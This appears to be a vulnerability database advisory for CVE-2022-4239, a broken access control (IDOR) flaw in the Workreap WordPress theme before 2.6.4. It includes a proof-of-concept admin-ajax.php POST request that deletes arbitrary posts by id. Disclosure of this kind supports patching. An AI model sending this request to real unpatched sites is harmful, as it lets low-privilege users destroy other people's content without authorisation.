Workreap < 2.6.4 – Subscriber+ Arbitrary Posts Deletion via IDOR | CVE 2022-4239 | Theme Vulnerabilities

Description

The theme does not verify that an addon service belongs to the user issuing the request, or indeed that it is an addon service, when processing the workreap_addons_service_remove action, allowing any user to delete any post by knowing or guessing the id.

Proof of Concept

POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: [Subscriber+]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

action=workreap_addons_service_remove&id=6191&security=295c6a26b2

Affects Themes

Fixed in 2.6.4

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

1c163987-fb53-43f7-bbff-1c2d8c0d694c

Timeline

Publicly Published

2022-12-02 (about 1 years ago)

Added

2022-12-02 (about 1 years ago)

Last Updated

2022-12-02 (about 1 years ago)

Other

Published

Title

Published

2024-02-26

Title

User Shortcodes Plus <= 2.0.2 - Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Disclosure via user_meta Shortcode

Published

2023-06-29

Title

SP Project & Document Manager < 4.68 - Subscriber+ Insecure Direct Object References

Published

2024-04-15

Title

Login with phone number < 1.7.17 - Unauthorized Account Password Change to Privilege Escalation

Published

2021-03-17

Title

BuddyPress < 7.2.1 - REST API Privilege Escalation

Published

2024-04-22

Title

ProfileGrid – User Profiles, Memberships, Groups and Communities < 5.8.0 - Insecure Direct Object Reference